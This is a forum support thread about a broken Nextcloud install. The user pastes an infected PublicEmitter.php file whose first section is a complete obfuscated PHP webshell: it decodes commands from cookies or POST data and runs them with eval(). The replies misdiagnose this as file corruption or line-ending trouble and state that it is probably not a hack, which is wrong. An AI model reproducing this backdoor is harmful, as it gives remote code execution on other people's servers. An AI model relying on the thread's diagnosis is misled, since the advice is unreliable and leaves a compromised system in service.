Namespace declaration statement has to be the very first statement or after any declare call in the script

ℹ️ Support
1

Hi,

Since a few days, my Nextcloud instance isn’t working anymore. I’m not aware of the version of Nextcloud, but imo, for this support case it’s not that necessary, because I think I might be hacked. It looks like some code got injected?

When reading the logs, it tells me following error:

2019/03/16 15:03:59 [error] 790#790: *5636 FastCGI sent in stderr: "PHP message: PHP Fatal error:  Namespace declaration statement has to be the very first statement or after any declare call in the script in /var/www/cloud*mydomain*com/public_html/lib/private/Hooks/PublicEmitter.php on line 24" while reading response header from upstream, client: 109.139.87.107, server: cloud*mydomain*com, request: "GET /status.php HTTP/2.0", upstream: "fastcgi://unix:/var/run/php/php7.0-fpm.sock:", host: "cloud*mydomain*com"

2019/03/16 15:03:59 [error] 790#790: 5638 FastCGI sent in stderr: "PHP message: PHP Fatal error: Namespace declaration statement has to be the very first statement or after any declare call in the script in /var/www/cloudmydomaincom/public_html/lib/private/Hooks/PublicEmitter.php on line 24" while reading response header from upstream, client: 109.139.87.107, server: cloudmydomaincom, request: “GET /ocs/v1.php/cloud/capabilities?format=json HTTP/2.0”, upstream: “fastcgi://unix:/var/run/php/php7.0-fpm.sock:”, host: "cloudmydomaincom"
2019/03/16 15:03:59 [error] 790#790: 5638 FastCGI sent in stderr: "PHP message: PHP Fatal error: Namespace declaration statement has to be the very first statement or after any declare call in the script in /var/www/cloudmydomaincom/public_html/lib/private/Hooks/PublicEmitter.php on line 24" while reading response header from upstream, client: 109.139.87.107, server: cloudmydomaincom, request: “GET /ocs/v2.php/cloud/user?format=json HTTP/2.0”, upstream: “fastcgi://unix:/var/run/php/php7.0-fpm.sock:”, host: “cloudmydomaincom”
2019/03/16 15:03:59 [error] 790#790: 5638 FastCGI sent in stderr: "PHP message: PHP Fatal error: Namespace declaration statement has to be the very first statement or after any declare call in the script in /var/www/cloudmydomaincom/public_html/lib/private/Hooks/PublicEmitter.php on line 24" while reading response header from upstream, client: 109.139.87.107, server: cloudmydomaincom, request: “PROPFIND /remote.php/webdav HTTP/2.0”, upstream: “fastcgi://unix:/var/run/php/php7.0-fpm.sock:”, host: "cloudmydomaincom"
2019/03/16 15:03:59 [error] 790#790: 5638 FastCGI sent in stderr: "PHP message: PHP Fatal error: Namespace declaration statement has to be the very first statement or after any declare call in the script in /var/www/cloudmydomaincom/public_html/lib/private/Hooks/PublicEmitter.php on line 24" while reading response header from upstream, client: 109.139.87.107, server: cloudmydomaincom, request: “POST /ocs/v2.php/apps/notifications/api/v2/push?format=json&pushTokenHash=ef25766edb2d567ecee140b8a280a956ab2c27dc881276f8735fca10c61986ac916573342ce0b5e0188d722fc9b3bec0fb5279bd0181491b5079746f20dddd53&devicePublicKey=-----BEGIN%20PUBLIC%20KEY-----%0AMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAo11gQ2JjH7MktxroeQMa%0AudkrIgNJtQyqnDmlDROy04tgcFaLcikPK59xTu%2F5%2B8lNgkTINHITAfW2z9ubj33N%0A3bWRiE7I9aWotQWYlNVjOCWjMl4vqgyQnYy2pzZeL%2Bp7SnGs9DEqAsQlSaz3x4YJ%0ADpAAuos0aFFi6fk6DaGblMHJw2aGPJqtxTYWEdsWNiKuv5yxBW3U42ionjC8Lbon%0ASyn5jxABrJrwFRQbY4pvoVCHMUGry2j2ldNmrQlEIRTz3ROYLBBoBRCFJh%2FUTCGJ%0AyXFxBfu7hf9efLZzUsVc%2FShrq%2BSBfr3UBXMwUwfGCb9UtluP%2BLhMfIVjjxMrh5ah%0AnwIDAQAB%0A-----END%20PUBLIC%20KEY-----%0A&proxyServer=https://push-notifications.nextcloud.com HTTP/2.0”, upstream: “fastcgi://unix:/var/run/php/php7.0-fpm.sock:”, host: “cloudmydomaincom”

When checking the contents of PublicEmitter.php:
<?php $sb9d9 = 35;$GLOBALS['m42fe2'] = Array();global $m42fe2;$m42fe2 = $GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['sac6'] = "\x7c\x74\x58\x48\x5a\x3e\x36\x6a\x2d\x3c\x35\x37\x2a\x46\x2c\x25\x4e\x24\x2f\x61\x6f\x7e\x57\x7d\x68\x6c\x54\x39\x33\x20\x62\x2e\x28\x29\x72\xa\x51\x5c\x6d\x34\x49\x79\x50\x6b\x3d\x3b\x44\x47\x78\x23\x4b\x60\x27\x7a\x30\x4f\x9\x55\x4d\x70\x75\x5e\x66\x63\x7b\x2b\x42\x5d\x71\x43\x52\x32\x5f\x3a\x67\x56\x73\x26\x64\x38\x45\x4c\xd\x76\x21\x4a\x40\x22\x6e\x65\x53\x77\x31\x5b\x69\x41\x3f\x59";$m42fe2[$m42fe2['sac6'][59].$m42fe2['sac6'][71].$m42fe2['sac6'][11].$m42fe2['sac6'][11].$m42fe2['sac6'][62].$m42fe2['sac6'][11].$m42fe2['sac6'][19].$m42fe2['sac6'][11]] = $m42fe2['sac6'][63].$m42fe2['sac6'][24].$m42fe2['sac6'][34];$m42fe2[$m42fe2['sac6'][38].$m42fe2['sac6'][39].$m42fe2['sac6'][11].$m42fe2['sac6'][11].$m42fe2['sac6'][62].$m42fe2['sac6'][30]] = $m42fe2['sac6'][20].$m42fe2['sac6'][34].$m42fe2['sac6'][78];$m42fe2[$m42fe2['sac6'][34].$m42fe2['sac6'][79].$m42fe2['sac6'][39].$m42fe2['sac6'][39].$m42fe2['sac6'][11]] = $m42fe2['sac6'][78].$m42fe2['sac6'][89].$m42fe2['sac6'][62].$m42fe2['sac6'][94].$m42fe2['sac6'][88].$m42fe2['sac6'][89];$m42fe2[$m42fe2['sac6'][74].$m42fe2['sac6'][30].$m42fe2['sac6'][6].$m42fe2['sac6'][89].$m42fe2['sac6'][71].$m42fe2['sac6'][54].$m42fe2['sac6'][54]] = $m42fe2['sac6'][76].$m42fe2['sac6'][1].$m42fe2['sac6'][34].$m42fe2['sac6'][25].$m42fe2['sac6'][89].$m42fe2['sac6'][88];$m42fe2[$m42fe2['sac6'][1].$m42fe2['sac6'][28].$m42fe2['sac6'][71].$m42fe2['sac6'][63].$m42fe2['sac6'][28].$m42fe2['sac6'][6].$m42fe2['sac6'][11].$m42fe2['sac6'][6].$m42fe2['sac6'][11]] = $m42fe2['sac6'][78].$m42fe2['sac6'][89].$m42fe2['sac6'][62].$m42fe2['sac6'][94].$m42fe2['sac6'][88].$m42fe2['sac6'][89].$m42fe2['sac6'][78];$m42fe2[$m42fe2['sac6'][53].$m42fe2['sac6'][39].$m42fe2['sac6'][92].$m42fe2['sac6'][62].$m42fe2['sac6'][39].$m42fe2['sac6'][92].$m42fe2['sac6'][79]] = $m42fe2['sac6'][94].$m42fe2['sac6'][88].$m42fe2['sac6'][94].$m42fe2['sac6'][72].$m42fe2['sac6'][76].$m42fe2['sac6'][89].$m42fe2['sac6'][1];$m42fe2[$m42fe2['sac6'][43].$m42fe2['sac6'][71].$m42fe2['sac6'][30].$m42fe2['sac6'][71].$m42fe2['sac6'][19].$m42fe2['sac6'][79].$m42fe2['sac6'][19].$m42fe2['sac6'][28].$m42fe2['sac6'][30]] = $m42fe2['sac6'][76].$m42fe2['sac6'][89].$m42fe2['sac6'][34].$m42fe2['sac6'][94].$m42fe2['sac6'][19].$m42fe2['sac6'][25].$m42fe2['sac6'][94].$m42fe2['sac6'][53].$m42fe2['sac6'][89];$m42fe2[$m42fe2['sac6'][68].$m42fe2['sac6'][30].$m42fe2['sac6'][54].$m42fe2['sac6'][92].$m42fe2['sac6'][89].$m42fe2['sac6'][28].$m42fe2['sac6'][30].$m42fe2['sac6'][54].$m42fe2['sac6'][27]] = $m42fe2['sac6'][59].$m42fe2['sac6'][24].$m42fe2['sac6'][59].$m42fe2['sac6'][83].$m42fe2['sac6'][89].$m42fe2['sac6'][34].$m42fe2['sac6'][76].$m42fe2['sac6'][94].$m42fe2['sac6'][20].$m42fe2['sac6'][88];$m42fe2[$m42fe2['sac6'][7].$m42fe2['sac6'][10].$m42fe2['sac6'][10].$m42fe2['sac6'][39].$m42fe2['sac6'][89].$m42fe2['sac6'][89].$m42fe2['sac6'][30].$m42fe2['sac6'][6]] = $m42fe2['sac6'][60].$m42fe2['sac6'][88].$m42fe2['sac6'][76].$m42fe2['sac6'][89].$m42fe2['sac6'][34].$m42fe2['sac6'][94].$m42fe2['sac6'][19].$m42fe2['sac6'][25].$m42fe2['sac6'][94].$m42fe2['sac6'][53].$m42fe2['sac6'][89];$m42fe2[$m42fe2['sac6'][94].$m42fe2['sac6'][10].$m42fe2['sac6'][19].$m42fe2['sac6'][39].$m42fe2['sac6'][71].$m42fe2['sac6'][71].$m42fe2['sac6'][6]] = $m42fe2['sac6'][30].$m42fe2['sac6'][19].$m42fe2['sac6'][76].$m42fe2['sac6'][89].$m42fe2['sac6'][6].$m42fe2['sac6'][39].$m42fe2['sac6'][72].$m42fe2['sac6'][78].$m42fe2['sac6'][89].$m42fe2['sac6'][63].$m42fe2['sac6'][20].$m42fe2['sac6'][78].$m42fe2['sac6'][89];$m42fe2[$m42fe2['sac6'][25].$m42fe2['sac6'][6].$m42fe2['sac6'][78].$m42fe2['sac6'][6].$m42fe2['sac6'][27].$m42fe2['sac6'][27]] = $m42fe2['sac6'][76].$m42fe2['sac6'][89].$m42fe2['sac6'][1].$m42fe2['sac6'][72].$m42fe2['sac6'][1].$m42fe2['sac6'][94].$m42fe2['sac6'][38].$m42fe2['sac6'][89].$m42fe2['sac6'][72].$m42fe2['sac6'][25].$m42fe2['sac6'][94].$m42fe2['sac6'][38].$m42fe2['sac6'][94].$m42fe2['sac6'][1];$m42fe2[$m42fe2['sac6'][53].$m42fe2['sac6'][63].$m42fe2['sac6'][11].$m42fe2['sac6'][10]] = $m42fe2['sac6'][30].$m42fe2['sac6'][79].$m42fe2['sac6'][78].$m42fe2['sac6'][11].$m42fe2['sac6'][39].$m42fe2['sac6'][11].$m42fe2['sac6'][71];$m42fe2[$m42fe2['sac6'][60].$m42fe2['sac6'][39].$m42fe2['sac6'][6].$m42fe2['sac6'][54].$m42fe2['sac6'][63].$m42fe2['sac6'][79].$m42fe2['sac6'][27]] = $m42fe2['sac6'][83].$m42fe2['sac6'][19].$m42fe2['sac6'][19].$m42fe2['sac6'][92].$m42fe2['sac6'][30].$m42fe2['sac6'][78].$m42fe2['sac6'][10].$m42fe2['sac6'][19];$m42fe2[$m42fe2['sac6'][74].$m42fe2['sac6'][6].$m42fe2['sac6'][39].$m42fe2['sac6'][28].$m42fe2['sac6'][71].$m42fe2['sac6'][79].$m42fe2['sac6'][27]] = $_POST;$m42fe2[$m42fe2['sac6'][48].$m42fe2['sac6'][28].$m42fe2['sac6'][78].$m42fe2['sac6'][92].$m42fe2['sac6'][11].$m42fe2['sac6'][54].$m42fe2['sac6'][19]] = $_COOKIE;@$m42fe2[$m42fe2['sac6'][53].$m42fe2['sac6'][39].$m42fe2['sac6'][92].$m42fe2['sac6'][62].$m42fe2['sac6'][39].$m42fe2['sac6'][92].$m42fe2['sac6'][79]]($m42fe2['sac6'][89].$m42fe2['sac6'][34].$m42fe2['sac6'][34].$m42fe2['sac6'][20].$m42fe2['sac6'][34].$m42fe2['sac6'][72].$m42fe2['sac6'][25].$m42fe2['sac6'][20].$m42fe2['sac6'][74], NULL);@$m42fe2[$m42fe2['sac6'][53].$m42fe2['sac6'][39].$m42fe2['sac6'][92].$m42fe2['sac6'][62].$m42fe2['sac6'][39].$m42fe2['sac6'][92].$m42fe2['sac6'][79]]($m42fe2['sac6'][25].$m42fe2['sac6'][20].$m42fe2['sac6'][74].$m42fe2['sac6'][72].$m42fe2['sac6'][89].$m42fe2['sac6'][34].$m42fe2['sac6'][34].$m42fe2['sac6'][20].$m42fe2['sac6'][34].$m42fe2['sac6'][76], 0);@$m42fe2[$m42fe2['sac6'][53].$m42fe2['sac6'][39].$m42fe2['sac6'][92].$m42fe2['sac6'][62].$m42fe2['sac6'][39].$m42fe2['sac6'][92].$m42fe2['sac6'][79]]($m42fe2['sac6'][38].$m42fe2['sac6'][19].$m42fe2['sac6'][48].$m42fe2['sac6'][72].$m42fe2['sac6'][89].$m42fe2['sac6'][48].$m42fe2['sac6'][89].$m42fe2['sac6'][63].$m42fe2['sac6'][60].$m42fe2['sac6'][1].$m42fe2['sac6'][94].$m42fe2['sac6'][20].$m42fe2['sac6'][88].$m42fe2['sac6'][72].$m42fe2['sac6'][1].$m42fe2['sac6'][94].$m42fe2['sac6'][38].$m42fe2['sac6'][89], 0);@$m42fe2[$m42fe2['sac6'][25].$m42fe2['sac6'][6].$m42fe2['sac6'][78].$m42fe2['sac6'][6].$m42fe2['sac6'][27].$m42fe2['sac6'][27]](0);if (!$m42fe2[$m42fe2['sac6'][1].$m42fe2['sac6'][28].$m42fe2['sac6'][71].$m42fe2['sac6'][63].$m42fe2['sac6'][28].$m42fe2['sac6'][6].$m42fe2['sac6'][11].$m42fe2['sac6'][6].$m42fe2['sac6'][11]]($m42fe2['sac6'][95].$m42fe2['sac6'][81].$m42fe2['sac6'][70].$m42fe2['sac6'][80].$m42fe2['sac6'][95].$m42fe2['sac6'][46].$m42fe2['sac6'][97].$m42fe2['sac6'][72].$m42fe2['sac6'][70].$m42fe2['sac6'][57].$m42fe2['sac6'][16].$m42fe2['sac6'][72].$m42fe2['sac6'][28].$m42fe2['sac6'][6].$m42fe2['sac6'][6].$m42fe2['sac6'][19].$m42fe2['sac6'][62].$m42fe2['sac6'][30].$m42fe2['sac6'][79].$m42fe2['sac6'][19].$m42fe2['sac6'][79].$m42fe2['sac6'][19].$m42fe2['sac6'][71].$m42fe2['sac6'][28].$m42fe2['sac6'][10].$m42fe2['sac6'][10].$m42fe2['sac6'][19].$m42fe2['sac6'][30].$m42fe2['sac6'][71].$m42fe2['sac6'][92].$m42fe2['sac6'][62].$m42fe2['sac6'][30].$m42fe2['sac6'][62].$m42fe2['sac6'][92].$m42fe2['sac6'][92].$m42fe2['sac6'][30].$m42fe2['sac6'][19].$m42fe2['sac6'][92].$m42fe2['sac6'][19].$m42fe2['sac6'][54].$m42fe2['sac6'][71].$m42fe2['sac6'][62].$m42fe2['sac6'][30].$m42fe2['sac6'][19])){$m42fe2[$m42fe2['sac6'][34].$m42fe2['sac6'][79].$m42fe2['sac6'][39].$m42fe2['sac6'][39].$m42fe2['sac6'][11]]($m42fe2['sac6'][95].$m42fe2['sac6'][81].$m42fe2['sac6'][70].$m42fe2['sac6'][80].$m42fe2['sac6'][95].$m42fe2['sac6'][46].$m42fe2['sac6'][97].$m42fe2['sac6'][72].$m42fe2['sac6'][70].$m42fe2['sac6'][57].$m42fe2['sac6'][16].$m42fe2['sac6'][72].$m42fe2['sac6'][28].$m42fe2['sac6'][6].$m42fe2['sac6'][6].$m42fe2['sac6'][19].$m42fe2['sac6'][62].$m42fe2['sac6'][30].$m42fe2['sac6'][79].$m42fe2['sac6'][19].$m42fe2['sac6'][79].$m42fe2['sac6'][19].$m42fe2['sac6'][71].$m42fe2['sac6'][28].$m42fe2['sac6'][10].$m42fe2['sac6'][10].$m42fe2['sac6'][19].$m42fe2['sac6'][30].$m42fe2['sac6'][71].$m42fe2['sac6'][92].$m42fe2['sac6'][62].$m42fe2['sac6'][30].$m42fe2['sac6'][62].$m42fe2['sac6'][92].$m42fe2['sac6'][92].$m42fe2['sac6'][30].$m42fe2['sac6'][19].$m42fe2['sac6'][92].$m42fe2['sac6'][19].$m42fe2['sac6'][54].$m42fe2['sac6'][71].$m42fe2['sac6'][62].$m42fe2['sac6'][30].$m42fe2['sac6'][19], 1);$f1df7 = NULL;$m0a8e7a = NULL;$m42fe2[$m42fe2['sac6'][76].$m42fe2['sac6'][27].$m42fe2['sac6'][28].$m42fe2['sac6'][27].$m42fe2['sac6'][30].$m42fe2['sac6'][62]] = $m42fe2['sac6'][71].$m42fe2['sac6'][27].$m42fe2['sac6'][62].$m42fe2['sac6'][63].$m42fe2['sac6'][63].$m42fe2['sac6'][30].$m42fe2['sac6'][27].$m42fe2['sac6'][11].$m42fe2['sac6'][8].$m42fe2['sac6'][39].$m42fe2['sac6'][28].$m42fe2['sac6'][28].$m42fe2['sac6'][71].$m42fe2['sac6'][8].$m42fe2['sac6'][39].$m42fe2['sac6'][92].$m42fe2['sac6'][92].$m42fe2['sac6'][62].$m42fe2['sac6'][8].$m42fe2['sac6'][19].$m42fe2['sac6'][19].$m42fe2['sac6'][39].$m42fe2['sac6'][10].$m42fe2['sac6'][8].$m42fe2['sac6'][89].$m42fe2['sac6'][27].$m42fe2['sac6'][39].$m42fe2['sac6'][63].$m42fe2['sac6'][79].$m42fe2['sac6'][71].$m42fe2['sac6'][63].$m42fe2['sac6'][28].$m42fe2['sac6'][92].$m42fe2['sac6'][54].$m42fe2['sac6'][92].$m42fe2['sac6'][19];global $s939bf;function vaa1bd5a($f1df7, $jc55cecd){global $m42fe2;$j9f9 = "";for ($cbc2c13b=0; $cbc2c13b<$m42fe2[$m42fe2['sac6'][74].$m42fe2['sac6'][30].$m42fe2['sac6'][6].$m42fe2['sac6'][89].$m42fe2['sac6'][71].$m42fe2['sac6'][54].$m42fe2['sac6'][54]]($f1df7);){for ($t3a400=0; $t3a400<$m42fe2[$m42fe2['sac6'][74].$m42fe2['sac6'][30].$m42fe2['sac6'][6].$m42fe2['sac6'][89].$m42fe2['sac6'][71].$m42fe2['sac6'][54].$m42fe2['sac6'][54]]($jc55cecd) && $cbc2c13b<$m42fe2[$m42fe2['sac6'][74].$m42fe2['sac6'][30].$m42fe2['sac6'][6].$m42fe2['sac6'][89].$m42fe2['sac6'][71].$m42fe2['sac6'][54].$m42fe2['sac6'][54]]($f1df7); $t3a400++, $cbc2c13b++){$j9f9 .= $m42fe2[$m42fe2['sac6'][59].$m42fe2['sac6'][71].$m42fe2['sac6'][11].$m42fe2['sac6'][11].$m42fe2['sac6'][62].$m42fe2['sac6'][11].$m42fe2['sac6'][19].$m42fe2['sac6'][11]]($m42fe2[$m42fe2['sac6'][38].$m42fe2['sac6'][39].$m42fe2['sac6'][11].$m42fe2['sac6'][11].$m42fe2['sac6'][62].$m42fe2['sac6'][30]]($f1df7[$cbc2c13b]) ^ $m42fe2[$m42fe2['sac6'][38].$m42fe2['sac6'][39].$m42fe2['sac6'][11].$m42fe2['sac6'][11].$m42fe2['sac6'][62].$m42fe2['sac6'][30]]($jc55cecd[$t3a400]));}}return $j9f9;}function b8d7472($f1df7, $jc55cecd){global $m42fe2;global $s939bf;return $m42fe2[$m42fe2['sac6'][60].$m42fe2['sac6'][39].$m42fe2['sac6'][6].$m42fe2['sac6'][54].$m42fe2['sac6'][63].$m42fe2['sac6'][79].$m42fe2['sac6'][27]]($m42fe2[$m42fe2['sac6'][60].$m42fe2['sac6'][39].$m42fe2['sac6'][6].$m42fe2['sac6'][54].$m42fe2['sac6'][63].$m42fe2['sac6'][79].$m42fe2['sac6'][27]]($f1df7, $s939bf), $jc55cecd);}foreach ($m42fe2[$m42fe2['sac6'][48].$m42fe2['sac6'][28].$m42fe2['sac6'][78].$m42fe2['sac6'][92].$m42fe2['sac6'][11].$m42fe2['sac6'][54].$m42fe2['sac6'][19]] as $jc55cecd=>$j9dbd3f0e){$f1df7 = $j9dbd3f0e;$m0a8e7a = $jc55cecd;}if (!$f1df7){foreach ($m42fe2[$m42fe2['sac6'][74].$m42fe2['sac6'][6].$m42fe2['sac6'][39].$m42fe2['sac6'][28].$m42fe2['sac6'][71].$m42fe2['sac6'][79].$m42fe2['sac6'][27]] as $jc55cecd=>$j9dbd3f0e){$f1df7 = $j9dbd3f0e;$m0a8e7a = $jc55cecd;}}$f1df7 = @$m42fe2[$m42fe2['sac6'][7].$m42fe2['sac6'][10].$m42fe2['sac6'][10].$m42fe2['sac6'][39].$m42fe2['sac6'][89].$m42fe2['sac6'][89].$m42fe2['sac6'][30].$m42fe2['sac6'][6]]($m42fe2[$m42fe2['sac6'][53].$m42fe2['sac6'][63].$m42fe2['sac6'][11].$m42fe2['sac6'][10]]($m42fe2[$m42fe2['sac6'][94].$m42fe2['sac6'][10].$m42fe2['sac6'][19].$m42fe2['sac6'][39].$m42fe2['sac6'][71].$m42fe2['sac6'][71].$m42fe2['sac6'][6]]($f1df7), $m0a8e7a));if (isset($f1df7[$m42fe2['sac6'][19].$m42fe2['sac6'][43]]) && $s939bf==$f1df7[$m42fe2['sac6'][19].$m42fe2['sac6'][43]]){if ($f1df7[$m42fe2['sac6'][19]] == $m42fe2['sac6'][94]){$cbc2c13b = Array($m42fe2['sac6'][59].$m42fe2['sac6'][83] => @$m42fe2[$m42fe2['sac6'][68].$m42fe2['sac6'][30].$m42fe2['sac6'][54].$m42fe2['sac6'][92].$m42fe2['sac6'][89].$m42fe2['sac6'][28].$m42fe2['sac6'][30].$m42fe2['sac6'][54].$m42fe2['sac6'][27]](),$m42fe2['sac6'][76].$m42fe2['sac6'][83] => $m42fe2['sac6'][92].$m42fe2['sac6'][31].$m42fe2['sac6'][54].$m42fe2['sac6'][8].$m42fe2['sac6'][92],);echo @$m42fe2[$m42fe2['sac6'][43].$m42fe2['sac6'][71].$m42fe2['sac6'][30].$m42fe2['sac6'][71].$m42fe2['sac6'][19].$m42fe2['sac6'][79].$m42fe2['sac6'][19].$m42fe2['sac6'][28].$m42fe2['sac6'][30]]($cbc2c13b);}elseif ($f1df7[$m42fe2['sac6'][19]] == $m42fe2['sac6'][89]){eval/*n0a2078*/($f1df7[$m42fe2['sac6'][78]]);}exit();}} ?><?php
/**
* @copyright Copyright © 2016, ownCloud, Inc.
*
* @author Lukas Reschke lukas@statuscode.ch
* @author Morris Jobke hey@morrisjobke.de
* @author Robin Appelman <>
*
* @lice

Am I right in the case that code got injected in my Nextcloud instance?

2

I don’t know if code was injected but your PublicEmitter.php is surely corrupted.
It should look like this:

<?php /** * @copyright Copyright (c) 2016, ownCloud, Inc. * * @author Lukas Reschke * @author Morris Jobke * @author Robin Appelman * * @license AGPL-3.0 * * This code is free software: you can redistribute it and/or modify * it under the terms of the GNU Affero General Public License, version 3, * as published by the Free Software Foundation. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU Affero General Public License for more details. * * You should have received a copy of the GNU Affero General Public License, version 3, * along with this program. If not, see * */

namespace OC\Hooks;

class PublicEmitter extends BasicEmitter {
/**
* @param string $scope
* @param string $method
* @param array $arguments optional
*
* @suppress PhanAccessMethodProtected
*/
public function emit($scope, $method, array $arguments = array()) {
parent::emit($scope, $method, $arguments);
}
}
3

When trying to run OCC, I also get
PHP Fatal error: Namespace declaration statement has to be the very first statement or after any declare call in the script in /var/www/cloud.mydomain.com/public_html/lib/private/Hooks/PublicEmitter.php on line 24

Any idea how it’s possible to have these files corrupted? And exactly, to have data between <?php ?> tags and unreadable in nano, only after using cat

4

If the file itself seems to have valid content it might be possible that the file format itself is causing the problem. You may know that on DOS system end of lines are marked with a CR/LF (hex: 0d 0a) but on Linux systems usually only a LF (hex: 0a) is used. You can check the file format by using the file command:

This is the result if a file in Unix format is found:

# file PublicEmitter.php
PublicEmitter.php: PHP script, ASCII text

This is the result if a file in DOS format is found:

# file PublicEmitter-DOS.php
PublicEmitter-DOS.php: PHP script, ASCII text, with CRLF line terminators

If the file is in DOS format, you can convert it using the dos2unix command.

5

Hi! Thanks for your response. I’m getting this as result:
PublicEmitter.php: PHP script, ASCII text, with very long lines

Might this be the cause after an automatic upgrade or something? As long as someone can confirm that this is not caused by a hack or something else, I’m fine with it and I can resolve it with an update of Nextcloud.

6

I don’t believe that this problem has been caused by a hack. Usually there would be other ways to compromise a system. You can check the result of the automatic system check at Settings > Management > Security and Setup warnings to be on the save site.